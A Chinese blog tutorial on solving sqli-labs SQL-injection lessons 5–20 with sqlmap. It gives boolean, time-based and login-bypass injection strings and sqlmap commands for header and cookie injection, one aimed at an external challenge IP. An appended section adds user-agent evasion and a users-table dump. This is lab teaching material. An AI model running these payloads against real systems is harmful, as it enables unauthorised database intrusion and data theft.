对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)

本文详细介绍使用SQLMap工具解决SQLi-Labs平台上的SQL注入挑战,涵盖多种注入类型及技巧,适合初学者实践。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

个人简介:
萌新一枚,渣渣一个,全程划水,会喊六六

本文断断续续已经写了三天了,其中查过很多其他人的博文

但是发现大多数人关于sql-labs使用的都是手工注入,

由于自己太渣,只能去找工具去注入(QAQ)

希望各位大佬不要见怪呀!!

不论喜欢与否都可以留言哦!!!!

关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式 

关于sql-labs中的1-4我已经在另一篇文章中写出具体的过程:

https://www.cnblogs.com/lxz-1263030049/p/9363151.html

sqli-labs:5-9 需要判断注入方式

具体判断方式如下:

1:用于验证时间延迟型的盲注:

?id=1’ and sleep(5) --+

 

2:用于判断布尔型盲注:

?id=1’ and 1=1 --+ , ?id=1' and 2=1 --

 

+

再根据回显的不同进行判断:

主要使用的语句:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0

或者:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs --batch

其中的—technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入

B:Boolean-based-blind  (布尔型型注入)

E:Error-based   (报错型注入)

U:Union query-based  (联合注入)

S:Starked queries   (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

T:Time-based blind  (基于时间延迟注入)

 

我们可以根据不同的报错提示更改—technique后面的字母

其中的—dbms : 不仅可以指定数据库类型,还可以指定数据库版本

--batch: 用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。

-v 0参数只是为了更好的截图.

 

第八题:

使用语句为:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs –batch

 

 

 

或者使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --current-db --threads 10 --batch --technique BES

 

 

 

就可以得到数据库的信息

第九题

属于延迟注入的题目(具体判断方法上面已经给出)同样也可以使用上面类似的语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T --dbs --batch -v 0

 

 

关于第11-17:

都是属于post注入的问题,只是内部参杂着盲注的问题,需要使用burp火狐浏览器的HackBar都是可以的·

第十一题:post注入,基于错误 - 字符型

 

 

根据post回显的值就可以进行sqlmap的跑测

使用的语句为:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=11111 &passwd=111111 &submit=Submit" --dbs --threads 10 --batch --technique ES

 

其中的:

--data:后面可以加上数据段(post/get类型的都是可以的)

--threads:最大并发线程,盲注时每个线程获取一个字符(7此请求),获取完成后线程结束,默认为1,建议不要超过10,否则可能影响站点可用性

 

 

 

 

下面的只是需要常规的操作就可以了

第十二题:

也是类似的过程就可以了:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit " --dbs --threads 10 --batch --technique E

 

 

 

或者使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or("1")=("1&passwd=")or("1")=("1&submit=Submi" --dbs --threads 10 --batch --technique BES

 

 

 

第十三题:可以使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS

 

 

同样也是可以得到答案的(其他几个也是类似的手法)

第十五题:布尔和时间延迟的盲注,

简单的注入语句为:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname='or'1'='1&passwd='or'1'='1&submit=Submit" --dbs --threads 10 --batch --technique BET

 

 

 

下面就是属于sqli-labs 18-20,

这三题主要时关于http的内容

常见的HTTP注入点产生位置为

【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】

 

第18题:报错型,单引号,user-agent型注入点

 

 

由于这一题时关于user-agent的注入直接使用语句:

python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BTES

关于txt的内容:

 
POST /sqli-labs-master/Less-18/ HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/sqli-labs-master/Less-18/

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

Connection: close

Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit
 

 

就是属于burp里面的内容

 

 

-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)

 

或者也可以这样:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch

 

 

 

--user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息

sqlmap 检查uesr-agent中的注入点, 

lever>=3才会去检查user-agent头是否存在注入漏洞

 

 

第十九题:报错型,单引号,referer型注入点

这一题的做法如同上一题一样都可以使用:

python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BEST

只是存为1.txt的文档变成了这个:

 
POST /sqli-labs-master/Less-19/ HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/sqli-labs-master/Less-19/*

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

Connection: close

Upgrade-Insecure-Requests: 1

 

uname=admin&passwd=admin&submit=Submit
 

 

另外也可以使用这样的语句跑出数据库:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch

 

 

 

至于里面的一些内容上面已经有一些介绍了

下面是最后一题就是

第二十题:报错型,单引号,cookie型注入

对于最后一题,我就用一个最近一个看到的一题结束吧

题目链接:http://202.112.51.184:16080/

 

 

直接进行抓包看一下:

 

 

Cookie有问题,直接使用sqlmap进行注入‘

python sqlmap.py -u "http://202.112.51.184:16080/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

 

 

 

--cookie

web应用基于cookie的身份验证,对于post请求,可以指定cookie

sqlmap -u "url" --cookie="..." --level 3 –dbs

 

 

 

参考文章:

sql-labs Less : https://www.cnblogs.com/peterpan0707007/p/7620048.html

sqlmap注入总结:http://blog.51cto.com/wt7315/1841241

SQLI-LAB  的 实战记录(Less 11 - Less 20):https://blog.youkuaiyun.com/qq_21500173/article/details/51920968

您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。

微信 支付宝
作者: 落花四月
关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!
### SQLMapSQLi-Labs第一关中的应用 对于SQLi-Labs靶场的第一关(Less-1),可以通过`sqlmap`工具实现自动化的SQL注入攻击。以下是具体的操作方法以及注意事项: #### 工具准备 确保已安装并配置好`sqlmap`环境。如果尚未安装,可通过以下命令完成安装: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap cd sqlmap ``` #### 基本操作流程 针对SQLi-Labs第一关的目标URL `http://localhost/sqli-labs/Less-1/?id=1`,可以执行如下命令来探测和利用漏洞。 ##### 探测可注入参数 运行以下命令以确认是否存在SQL注入漏洞,并定位到具体的注入点: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --risk=3 --level=5 --random-agent --batch ``` 上述命令中各选项的作用分别为: - `-u`: 指定目标URL。 - `--risk=3`: 设置风险级别为最高级,尝试更多复杂的payload[^1]。 - `--level=5`: 设定测试强度为最高等级,覆盖尽可能多的场景。 - `--random-agent`: 随机化User-Agent头信息,规避可能的安全防护机制[^2]。 - `--batch`: 自动处理所有交互式提示,默认选择推荐选项[^3]。 ##### 枚举数据库信息 一旦确认存在注入漏洞,则继续深入挖掘敏感数据。例如枚举当前使用数据库名称: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db --batch ``` 此命令会返回当前正在使用数据库名字。 ##### 列出所有可用数据库 为了进一步了解服务器上的其他潜在资源,还可以列举全部数据库列表: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs --batch ``` 通过该命令可以获得完整的数据库集合。 ##### 查找特定数据库内的表格结构 假设已经得知某个感兴趣的具体数据库名为`testDB`,那么就可以查询其内部包含哪些表单: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB --tables --batch ``` 这里指定了目标数据库并通过`--tables`获取其中存储的数据表清单。 ##### 提取指定表的内容列定义 当明确了某张表之后,下一步便是研究它的字段构成情况: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --columns --batch ``` 这条语句用于揭示所选表(`users`)的各项属性描述。 ##### 导出实际记录值 最后一步就是导出整张表里的真实数据条目了: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --dump --batch ``` 至此完成了从发现漏洞直至提取有用情报的一系列动作。 ### 注意事项 尽管`sqlmap`功能强大,但在实战环境中需谨慎行事,避免触犯法律红线。仅限于授权范围内的渗透测试活动才允许使用此类技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值